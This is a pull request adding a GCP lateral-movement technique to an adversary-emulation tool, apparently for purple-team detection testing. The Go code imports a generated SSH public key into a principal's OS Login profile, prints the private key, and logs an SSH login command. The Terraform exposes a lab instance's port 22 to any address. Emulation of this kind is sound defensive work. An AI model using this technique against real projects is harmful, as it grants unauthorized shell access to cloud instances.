### PR TITLE
New technique: Import SSH public key to profile

### DIFF
--- a/docs/attack-techniques/GCP/index.md
+++ b/docs/attack-techniques/GCP/index.md
@@ -18,6 +18,11 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 - [Exfiltrate Compute Disk by sharing a snapshot](./gcp.exfiltration.share-compute-snapshot.md)
 
 
+## Lateral Movement
+
+- [Import SSH public key to profile](./gcp.lateral-movement.oslogin-import-sshkey.md)
+
+
 ## Persistence
 
 - [Backdoor a GCP Service Account through its IAM Policy](./gcp.persistence.backdoor-service-account-policy.md)

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -67,6 +67,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Exfiltrate Compute Disk by sharing it](./GCP/gcp.exfiltration.share-compute-disk.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Image by sharing it](./GCP/gcp.exfiltration.share-compute-image.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Disk by sharing a snapshot](./GCP/gcp.exfiltration.share-compute-snapshot.md) | [GCP](./GCP/index.md) | Exfiltration |
+| [Import SSH public key to profile](./GCP/gcp.lateral-movement.oslogin-import-sshkey.md) | [GCP](./GCP/index.md) | Lateral Movement |
 | [Backdoor a GCP Service Account through its IAM Policy](./GCP/gcp.persistence.backdoor-service-account-policy.md) | [GCP](./GCP/index.md) | Persistence |
 | [Create an Admin GCP Service Account](./GCP/gcp.persistence.create-admin-service-account.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Create a GCP Service Account Key](./GCP/gcp.persistence.create-service-account-key.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |

--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -415,6 +415,14 @@ GCP:
             - Exfiltration
           platform: GCP
           isIdempotent: true
+    Lateral Movement:
+        - id: gcp.lateral-movement.oslogin-import-sshkey
+          name: Import SSH public key to profile
+          isSlow: true
+          mitreAttackTactics:
+            - Lateral Movement
+          platform: GCP
+          isIdempotent: true
     Persistence:
         - id: gcp.persistence.backdoor-service-account-policy
           name: Backdoor a GCP Service Account through its IAM Policy

--- a/v2/go.mod
+++ b/v2/go.mod
@@ -55,6 +55,7 @@ require (
 	cloud.google.com/go/auth/oauth2adapt v0.2.7 // indirect
 	cloud.google.com/go/compute/metadata v0.6.0 // indirect
 	cloud.google.com/go/iam v1.3.1 // indirect
+	cloud.google.com/go/oslogin v1.14.3 // indirect
 	github.com/Azure/azure-sdk-for-go/sdk/internal v1.10.0 // indirect
 	github.com/AzureAD/microsoft-authentication-library-for-go v1.2.2 // indirect
 	github.com/ProtonMail/go-crypto v1.1.0-alpha.2 // indirect

--- a/v2/go.sum
+++ b/v2/go.sum
@@ -11,6 +11,8 @@ cloud.google.com/go/compute/metadata v0.6.0 h1:A6hENjEsCDtC1k8byVsgwvVcioamEHvZ4
 cloud.google.com/go/compute/metadata v0.6.0/go.mod h1:FjyFAW1MW0C203CEOMDTu3Dk1FlqW3Rga40jzHL4hfg=
 cloud.google.com/go/iam v1.3.1 h1:KFf8SaT71yYq+sQtRISn90Gyhyf4X8RGgeAVC8XGf3E=
 cloud.google.com/go/iam v1.3.1/go.mod h1:3wMtuyT4NcbnYNPLMBzYRFiEfjKfJlLVLrisE7bwm34=
+cloud.google.com/go/oslogin v1.14.3 h1:yomxnFPk+ye0zd0mJ15nn9fH4Ns7ex4xA3ll+u2q59A=
+cloud.google.com/go/oslogin v1.14.3/go.mod h1:fDEGODTG/W9ZGUTHTlMh8euXWC1fTcgjJ9Kcxxy14a8=
 cloud.google.com/go/secretmanager v1.14.4 h1:SMWQMsUcACsdIuVhIBAw+QfKY4Xseiaa8qDnunjmhcM=
 cloud.google.com/go/secretmanager v1.14.4/go.mod h1:pjwFw8+A6B4AcWrVXruLfz1QykkpMr8T/VT+zXB91iw=
 dario.cat/mergo v1.0.0 h1:AGCNq9Evsj31mOgNPcLyXc+4PNABt905YmuqPYYpBWk=

--- a/v2/internal/attacktechniques/gcp/lateral-movement/oslogin-import-sshkey/main.go
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/oslogin-import-sshkey/main.go
@@ -1,0 +1,112 @@
+package gcp 
+
+import (
+    "context"
+    _ "embed"
+    "time"
+    "fmt"
+    "log"
+    oslogin   "cloud.google.com/go/oslogin/apiv1"
+    commonpb  "cloud.google.com/go/oslogin/common/commonpb"
+    osloginpb "cloud.google.com/go/oslogin/apiv1/osloginpb"
+    gcp_utils "github.com/datadog/stratus-red-team/v2/internal/utils/gcp"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+)
+
+//go:embed main.tf
+var tf []byte 
+
+func init() {
+    const CodeBlock = "```"
+    const AttackTechniqueId = "gcp.lateral-movement.oslogin-import-sshkey"
+
+    stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+        ID:             AttackTechniqueId,
+        FriendlyName:   "Import SSH public key to profile",
+        Description:`
+Register SSH public key to profile of user or service account. This key is set to valid for 30 minutes.
+
+Warm-up:
+
+- Create a compute instance (Linux).
+
+Detonation:
+
+- Create RSA key-pair (private key and public key)
+- Register public key to user's profile
+- Print private key to stdout
+
+Note that you need to save the private key for login.
+
+The following IAM roles determine what privileges when accessing the instance using oslogin:
+
+- roles/compute.osLogin (no sudo)
+- roles/compute.osAdminLogin (has sudo)
+
+Reference:
+
+- https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+`,
+        Detection:`under construction`,
+        Platform:                   stratus.GCP,
+        IsIdempotent:               true,
+        MitreAttackTactics:         []mitreattack.Tactic{mitreattack.LateralMovement},
+        PrerequisitesTerraformCode: tf,
+        Detonate:                   detonate,
+    })
+}
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+    gcp := providers.GCP()
+    ctx := context.Background()
+
+    projectId    := gcp.GetProjectId()
+    instanceIp   := params["instance_ip"]
+    principal    := params["principal"]
+
+    log.Printf("Principal: %s | project: %s\n", principal, projectId)
+
+    // create oslogin service
+    client, err := oslogin.NewClient(ctx)
+    if err != nil {
+        return fmt.Errorf("Failed to create new service client: %v", err)
+    }
+    defer client.Close()
+
+    log.Println("Generating public/private key pair for user")
+
+    // create RSA public/private key pair
+    key, err := gcp_utils.CreateSSHKeyPair()
+    if err != nil {
+        return fmt.Errorf("Failed to create RSA key-pair: %v", err)
+    }
+
+    log.Println("Registering key to user")
+
+    // importing the key (only valid for 30 minutes)
+    parent := fmt.Sprintf("users/%s", principal)
+    pubkey := &commonpb.SshPublicKey {
+        Key:                string(key.PublicKey),
+        ExpirationTimeUsec: time.Now().Add(30 * time.Minute).UnixMicro(),
+    }
+
+    resp, err := client.ImportSshPublicKey(ctx, &osloginpb.ImportSshPublicKeyRequest {
+        Parent:       parent,
+        SshPublicKey: pubkey,
+        ProjectId:    projectId,
+    })
+    if err != nil {
+        return fmt.Errorf("Failed to register SSH key: %v", err)
+    }
+
+    // retrieve the username created by oslogin
+    username := resp.LoginProfile.PosixAccounts[0].Username
+
+    log.Printf("Save this private key as 'account.priv':\n\n%s\n", key.PrivateKey)
+    log.Println("Attacker can now login to the instance using the following command:")
+    log.Printf("ssh -i account.priv %s@%s", username, instanceIp)
+    log.Printf("Wait 30 minutes for the key to expire")
+
+    return nil 
+}

--- a/v2/internal/attacktechniques/gcp/lateral-movement/oslogin-import-sshkey/main.tf
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/oslogin-import-sshkey/main.tf
@@ -1,0 +1,99 @@
+terraform {
+  required_providers {
+    google = {
+      source  = "hashicorp/google"
+      version = "~> 6.18.1"
+    }
+  }
+}
+
+provider "google" {
+  default_labels = {
+    stratus-red-team = "true"
+  }
+}
+
+locals {
+  resource_prefix = "stratus-red-team-oisk"
+  region          = "us-east1"
+  instance_type   = "f1-micro"
+  image           = "debian-cloud/debian-11"
+}
+
+resource "random_string" "suffix" {
+  special = false
+  length  = 16
+  min_lower = 16
+}
+
+data "google_client_openid_userinfo" "whoami" { }
+
+data "google_compute_zones" "available" {
+  region = local.region
+}
+
+resource "google_compute_network" "network" {
+  name  = "${local.resource_prefix}-vpc-${random_string.suffix.result}"
+  routing_mode = "REGIONAL"
+  auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "subnet" {
+  name          = "${local.resource_prefix}-subnet-${random_string.suffix.result}"
+  ip_cidr_range = "10.10.1.0/24"
+  network       = google_compute_network.network.id
+  region        = local.region
+}
+
+resource "google_compute_firewall" "firewall" {
+  name = "${local.resource_prefix}-firewall-${random_string.suffix.result}"
+  network = google_compute_network.network.id
+
+  allow {
+    protocol = "tcp"
+    ports    = ["22"]
+  }
+
+  source_ranges = ["0.0.0.0/0"]
+  target_tags   = ["ssh-access"]
+}
+
+resource "google_compute_instance" "target" {
+  name         = "${local.resource_prefix}-vm-${random_string.suffix.result}"
+  machine_type = local.instance_type
+  zone         = data.google_compute_zones.available.names[0]
+  hostname     = "target-${random_string.suffix.result}.stratus.local"
+  tags         = ["ssh-access"]
+
+  boot_disk {
+    initialize_params {
+      image = local.image
+    }
+  }
+
+  network_interface {
+    network    = google_compute_network.network.id
+    subnetwork = google_compute_subnetwork.subnet.id
+
+    access_config { }
+  }
+
+  metadata = {
+    enable-oslogin: "TRUE"
+  }
+}
+
+output "display" {
+  value = format("Linux instance (hostname: %s, ip: %s) is ready", 
+    google_compute_instance.target.name,
+    google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+  )  
+}
+
+output "principal" {
+  value = data.google_client_openid_userinfo.whoami.email
+}
+
+output "instance_ip" {
+  value = google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -58,6 +58,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-disk"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-image"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/lateral-movement/oslogin-import-sshkey"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/backdoor-service-account-policy"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-service-account-key"


### PR DESCRIPTION
### What does this PR do?

* add new technique: Import SSH public key to profile

Lateral movement by importing SSH key to profile and login to compute instance. However, the key is limited duration (set by user, default: 30 minutes).

### Motivation

This technique is developed as part of Grab's purple teaming activity and we want to share it so more people can get the benefit.

------

Co-authored-by: Satria Ady Pradana <xathrya@reversing.id>